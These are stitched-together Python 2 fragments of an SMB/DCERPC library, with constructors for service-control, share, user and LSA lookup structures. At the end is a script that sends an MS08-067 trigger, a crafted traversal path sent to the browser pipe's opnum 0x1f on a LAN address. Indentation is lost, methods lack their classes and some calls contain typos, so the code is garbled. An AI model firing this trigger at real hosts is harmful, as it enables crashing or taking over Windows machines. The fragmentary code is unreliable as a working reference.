def __init__(self,
data=None,
machine_name='',
database_name='',
desired_access=0,
is_unicode=True):
Struct.__init__(self, data)
if data is not None:
pos = 0
self['MachineNamePtr'] = unpack('<L', data[pos:pos + 4])
pos += 4
self['MachineName'] = DCERPCString(data=data[pos:])
pos += len(self['MachineName'].pack())
self['DatabaseNamePtr'] = unpack('<L', data[pos:pos + 4])
pos += 4
self['DatabaseName'] = DCERPCString(data=data[pos:])
pos += len(self['DatabaseName'].pack())
self['DesiredAccess'] = unpack('<L', data[pos:pos + 4])
else:
if len(machine_name):
self['MachineName'] = DCERPCString(
string=machine_name.encode('UTF-16LE'))
self['MachineNamePtr'] = 0x20004
if len(database_name):
self['DatabaseName'] = DCERPCString(
string=database_name.encode('UTF-16LE'))
self['DatabaseNamePtr'] = 0x20008
self['DesiredAccess'] = desired_access
def __init__(self, data=None, extradata=None):
Struct.__init__(self, data)
if data is not None:
pos = self.calcsize()
if self['Length'] == 0:
self['Name'] = DCERPCString(string='')
else:
self['Name'] = DCERPCString(data=extradata)
def pack(self):
if len(self['ServerName']):
data = pack('<L', 0x20004)
data += DCERPCString(string = self['ServerName']).pack()
else:
data = pack('<L', 0) # Null Ptr
data += DCERPCString(string = self['NetName']).pack()
data += pack('<L', self['Level'])
return data
def pack(self):
data =Struct.pack(self)
for i in xrange(self['MaxCount']):
data += pack('<L', 0x20010+i*4)
data += pack('<L', self.shares[i]['type'])
data += pack('<L', 0x20100+i*4)
for i in xrange(self['MaxCount']):
data += DCERPCString(string=self.shares[i]['name'].encode('UTF-16LE'), is_unicode=True).pack()
data += DCERPCString(string=self.shares[i]['comment'].encode('UTF-16LE'), is_unicode=True).pack()
return data
def __init__(self, data=None, manager_handle='', service_name='', is_unicode=True):
Struct.__init__(self, data)
if data is not None:
pos = 0
self['ManagerHandle'] = unpack('20s', data[pos:pos+20])
pos += 20
self['ServiceName'] = DCERPCString(data=data[pos:])
pos += len(self['ServiceName'].pack())
self['AccessMask'] = unpack('<L', data[pos:pos+4])
else:
self['ManagerHandle'] = manager_handle
self['ServiceName'] = DCERPCString(string=service_name.encode('UTF-16LE'))
def __init__(self, data=None, ShareArray=[]):
Struct.__init__(self, data)
self.shares = []
if data is not None:
pos = self.calcsize()
for i in xrange(self['MaxCount']):
refptr = unpack('<L', data[pos:pos + 4])[0]
pos += 4
stype = unpack('<L', data[pos:pos + 4])[0]
pos += 4
self.shares.append({'type': stype})
refptr2 = unpack('<L', data[pos:pos + 4])[0]
pos += 4
for i in xrange(self['MaxCount']):
s = DCERPCString(data=data[pos:])
self.shares[i]['name'] = s.get_string().decode(
'UTF-16LE').encode('ascii')[:-1]
pos += len(s.pack())
s2 = DCERPCString(data=data[pos:])
self.shares[i]['comment'] = s2.get_string().decode(
'UTF-16LE').encode('ascii')[:-1]
pos += len(s2.pack())
else:
self.shares = ShareArray
self['MaxCount'] = len(self.shares)
def __init__(self, data=None, service_handle='', args=[], is_unicode=True):
Struct.__init__(self, data)
if not data:
self['ServiceHandle'] = service_handle
self['argc'] = len(args)
self['argv'] = [ DCERPCString(string=arg.encode('ASCII'), is_unicode=False) for arg in args ]
else:
pos = 28
self['argc'] = len(args)
self['argv'] = []
for i in xrange(self['argc']):
arg = DCERPCString(data=data[pos:])
self['argv'].append(arg)
pos += len(arg.pack())
def pack(self):
# PolicyHandle
data = self['PolicyHandle']
# NamesArray
names = self['NamesArray']
data += pack('<L', self['Count'])
data += pack('<L', self['Count'])
size = 0
for i in xrange(len(names)):
size = len(names[i])
data += pack('<H', size)
data += pack('<H', size)
data += pack('<L', 2 + i)
for i in xrange(len(names)):
data += DCERPCString(string=names[i],
is_unicode=True).pack(force_null_byte=0)
# Padding is mandatory
if (len(data) % 4) != 0:
data += '\0' * (4 - (len(data) % 4))
# SidsArray
data += LsaTransSidArray().pack()
# Level
data += pack('<H', self['LsaLookupLevel'])
data += pack('<H', 0) # padding
# Count
data += pack('<L', 0)
return data
def pack(self):
data = pack('<L', 0x20004)
data += DCERPCString(string=self['SystemName']).pack()
data += self['ObjectAttributes']
data += Struct.pack(self)
return data
def __init__(self, data=None, UsernameArray=[]):
Struct.__init__(self, data)
self.usernames = []
if data is not None:
Struct.__init__(self, data)
pos = self.calcsize()
for i in xrange(self['MaxCount']):
refptr = unpack('<L', data[pos:pos+4])[0]
pos += 4
for i in xrange(self['MaxCount']):
s = DCERPCString(data=data[pos:])
self.usernames.append(s.get_string().decode('UTF-16LE').encode('ascii')[:-1])
pos += len(s.pack())
self['UsernameArray'] = ''.join(UsernameArray)
else:
self.usernames = UsernameArray
self['MaxCount'] = len(self.usernames)
self['UsernameArray'] = ''.join(UsernameArray)
def pack(self):
if len(self['ServerName']):
data = pack('<L', 0x20004)
data += DCERPCString(string=self['ServerName']).pack()
else:
data = pack('<L', 0) # Null Ptr
data += self['UserInfo'].pack()
data += pack('<L', self['PrefMaxLen'])
data += self['ResumeHandle'].pack()
return data
def __init__(self, data=None, manager_handle='\x00'*20,
service_name='',
binary_pathname='',
display_name='',
start_type=SVCCTL_SERVICE_DEMAND_START,
is_unicode=True):
Struct.__init__(self, data)
if data is not None:
pos = 0
self['ManagerHandle'] = data[pos:pos+20]
pos += 20
self['ServiceName'] = DCERPCString(data=data[pos:])
pos += len(self['ServiceName'].pack())
self['DisplayNamePtr'] = data[pos:pos+4]
self['DisplayName'] = DCERPCString(data=data[pos:])
pos += len(self['DisplayName'].pack())
self['AccessMask'] = data[pos:pos+4]
pos += 4
self['ServiceType'] = data[pos:pos+4]
pos += 4
self['ServiceStartType'] = data[pos:pos+4]
pos += 4
self['ServiceErrorControl'] = data[pos:pos+4]
pos += 4
self['BinaryPathName'] = DCERPCString(data=data[pos:])
pos += len(self['BinaryPathName'].pack())
self['LoadOrderGroupPtr'] = data[pos:pos+4]
pos += 4
self['TagId'] = data[pos:pos+4]
pos += 4
self['DependenciesPtr'] = data[pos:pos+4]
if self['DependenciesPtr']:
logging.eror('SVCCTL_ERROR: DependenciesPtr != 0')
return
pos += 4
self['DependSize'] = data[pos:pos+4]
pos += 4
self['ServiceStartNamePtr'] = data[pos:pos+4]
if self['ServiceStartNamePtr']:
logging.eror('SVCCTL_ERROR: DependenciesPtr != 0')
return
pos += 4
self['PasswordPtr'] = data[pos:pos+4]
if self['PasswordPtr']:
logging.eror('SVCCTL_ERROR: DependenciesPtr != 0')
return
pos += 4
self['PasswordSize'] = data[pos:pos+4]
else:
self['ManagerHandle'] = manager_handle
self['ServiceName'] = DCERPCString(string=service_name.encode('UTF-16LE'))
self['BinaryPathName'] = DCERPCString(string=binary_pathname.encode('UTF-16LE'))
if len(display_name):
self['DisplayName'] = DCERPCString(string=display_name.encode('UTF-16LE'))
self['DisplayNamePtr'] = 0x20004
else:
self['DisplayNamePtr'] = 0
self['ServiceStartType'] = start_type
def __init__(self, data=None, Name='', Sid=''):
Struct.__init__(self, data)
if data is None:
if Name is not None:
self['NameLength'] = len(Name)
self['NameSize'] = len(Name)
self['NamePtr'] = 0x2000040
self['NameString'] = DCERPCString(
string=Name.encode('UTF-16LE'))
if Sid is not None:
self['SidPtr'] = 0x2000050
self['Sid'] = DCERPCSid(Sid=Sid)
def __init__(self, data=None, Sids=[]):
Struct.__init__(self, data)
if data is not None:
pos1 = self.calcsize()
objsize = LsaTranslatedNameEx2().calcsize()
pos2 = pos1 + objsize * self['Count']
self['Names'] = []
for i in xrange(self['Count']):
Name = LsaTranslatedNameEx2(data=data[pos1:],
extradata=data[pos2:])
self['Names'].append(Name)
pos1 += Name.calcsize()
name_str = Name.get_name()['Name']
if len(name_str):
pos2 += len(
DCERPCString(string=name_str, is_unicode=False).pack())
else:
self['Count'] = len(Sids)
self['NamesPtr'] = 0x020010
self['MaxCount'] = len(Sids)
self['Sids'] = Sids
def __init__(self, data=None, ShareArray=[]):
Struct.__init__(self, data)
self.shares = []
if data is not None:
pos = 0
refptr = unpack('<L', data[pos:pos+4])[0]
pos += 4
refptr = unpack('<L', data[pos:pos+4])[0]
pos += 4
self['Type'] = unpack('<L', data[pos:pos+4])[0]
pos += 4
refptr = unpack('<L', data[pos:pos+4])[0]
pos += 4
self['Permission'] = unpack('<L', data[pos:pos+4])[0]
pos += 4
self['MaxUses'] = unpack('<L', data[pos:pos+4])[0]
pos += 4
self['CurrentUses'] = unpack('<L', data[pos:pos+4])[0]
pos += 4
refptr = unpack('<L', data[pos:pos+4])[0]
pos += 4
refptr = unpack('<L', data[pos:pos+4])[0]
pos += 4
s = DCERPCString(data=data[pos:])
self['NetName'] = s.get_string().decode('UTF-16LE').encode('ascii')[:-1]
pos += len(s.pack())
s = DCERPCString(data=data[pos:])
self['Comment'] = s.get_string().decode('UTF-16LE').encode('ascii')[:-1]
pos += len(s.pack())
s = DCERPCString(data=data[pos:])
self['Path'] = s.get_string().decode('UTF-16LE').encode('ascii')[:-1]
pos += len(s.pack())
s = DCERPCString(data=data[pos:])
self['Passwd'] = s.get_string().decode('UTF-16LE').encode('ascii')[:-1]
pos += len(s.pack())
else:
pass ## TODO
import sys
from struct import pack
if '.' not in sys.path:
sys.path.append('.')
from libs.newsmb.libdcerpc import DCERPC, DCERPCString
print '***** Testing Windows 2000 Trigger for MS08-067 *****'
path = u'A\\..\\..\\'.encode('UTF-16LE')
mark = len(path)
path += u'\0'.encode('UTF-16LE')
data =''
data += pack('<L', 1)
data += DCERPCString(string = u'EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE'.encode('UTF-16LE')).pack()
data += '\0\0'
data += DCERPCString(string = path).pack()
data += '\0\0'
data += pack('<L', 2)
data += DCERPCString(string = u'\\'.encode('UTF-16LE')).pack()
data += pack('<LL', 1, 1)
dce = DCERPC(u'ncacn_np:192.168.2.107[\\browser]', getsock=None)
#dce.max_dcefrag = 100
dce.bind(u'4b324fc8-1670-01d3-1278-5a47bf6ee188', u'3.0') #, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.call(0x1f, data, response=True)
print dce.reassembled_data.encode('hex')
def unpack_name(self, data):
self['NameString'] = DCERPCString(data=data)